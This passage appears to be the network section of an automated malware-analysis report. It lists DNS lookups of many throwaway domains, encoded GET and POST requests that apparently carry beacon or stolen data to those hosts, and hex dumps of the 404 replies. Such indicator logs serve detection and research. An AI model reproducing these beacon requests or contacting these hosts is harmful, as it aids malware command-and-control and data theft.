                Source: global trafficHTTP traffic detected: GET /uvge/?H8=BpFD-28hKhrD&GX6Lp2F=ZNVrNdoQnhuwr8rXgpUIPH4b9LjaUdnqJW8zgtLXFLLe8onm6IbnH5k6/OJNpvCzw5jcHu1YLU/U3UlnXJzWKm/g482Cdi9CT/rc1yKmW5XeMaWPeg== HTTP/1.1Host: www.christinascuties.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /bokt/?GX6Lp2F=poyWHxU0sXOGQX6eVUDBw1lp5X+IA5CiyB6gAIqfCj73s4Aj6MIiBsrDm9nDs7uyJKeVN/2spsRHx0Xh4EIWPHPhLhUxqk/k6TQj/zpRoAwTN6gmaA==&H8=BpFD-28hKhrD HTTP/1.1Host: www.717hy.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /cxxv/?H8=BpFD-28hKhrD&GX6Lp2F=fEi8rzaYrE/XGRR50VEK8uqDXr7AK/1Kw/XUmUqnafTsdiSkrhbsiNoZNrJqJtIqpPiDC/W6aTtfGFbS6ow8ixkLbruB9JsRPd8yCP6sEcEmGu+VbQ== HTTP/1.1Host: www.izmirescortg.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
                Source: global trafficDNS traffic detected: DNS query: www.bookingservice.center
                Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini06.click
                Source: global trafficDNS traffic detected: DNS query: www.hm35s.top
                Source: global trafficDNS traffic detected: DNS query: www.snehasfashion.shop
                Source: global trafficDNS traffic detected: DNS query: www.sitioseguro.blog
                Source: global trafficDNS traffic detected: DNS query: www.windsky.click
                Source: global trafficDNS traffic detected: DNS query: www.cssa.auction
                Source: global trafficDNS traffic detected: DNS query: www.moviebuff.info
                Source: global trafficDNS traffic detected: DNS query: www.whisperart.net
                Source: global trafficDNS traffic detected: DNS query: www.christinascuties.net
                Source: global trafficDNS traffic detected: DNS query: www.717hy.net
                Source: global trafficDNS traffic detected: DNS query: www.izmirescortg.xyz
                Source: unknownHTTP traffic detected: POST /47f1/ HTTP/1.1Host: www.bookingservice.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.bookingservice.centerContent-Length: 196Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.bookingservice.center/47f1/User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0Data Raw: 47 58 36 4c 70 32 46 3d 4d 4d 66 73 53 74 61 41 77 79 31 44 69 58 54 53 6b 47 53 56 33 75 67 4f 72 2f 70 6f 47 4c 43 6f 79 76 75 56 53 71 48 55 48 35 4b 6e 52 59 34 4a 39 76 63 35 43 30 67 67 6f 34 50 77 58 58 78 2f 51 2f 2f 41 37 36 48 42 4d 66 56 68 47 70 45 30 44 43 74 31 35 56 49 49 73 48 59 38 2f 51 53 77 2b 4a 4d 52 5a 30 78 63 4f 43 56 63 6d 70 63 72 39 6b 39 43 44 55 45 66 63 6f 61 39 6c 59 57 50 78 58 6a 51 7a 36 31 64 54 69 57 73 69 57 2f 31 4a 74 48 73 72 64 73 44 71 56 42 64 77 4b 6d 44 58 70 49 74 44 71 45 58 72 42 4e 53 6b 33 6f 31 76 76 2b 43 4d 53 53 57 56 63 78 66 Data Ascii: GX6Lp2F=MMfsStaAwy1DiXTSkGSV3ugOr/poGLCoyvuVSqHUH5KnRY4J9vc5C0ggo4PwXXx/Q//A76HBMfVhGpE0DCt15VIIsHY8/QSw+JMRZ0xcOCVcmpcr9k9CDUEfcoa9lYWPxXjQz61dTiWsiW/1JtHsrdsDqVBdwKmDXpItDqEXrBNSk3o1vv+CMSSWVcxf
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:21:48 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sun, 24 Nov 2024 07:22:04 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sun, 24 Nov 2024 07:22:07 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sun, 24 Nov 2024 07:22:10 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sun, 24 Nov 2024 07:22:12 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:22:20 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 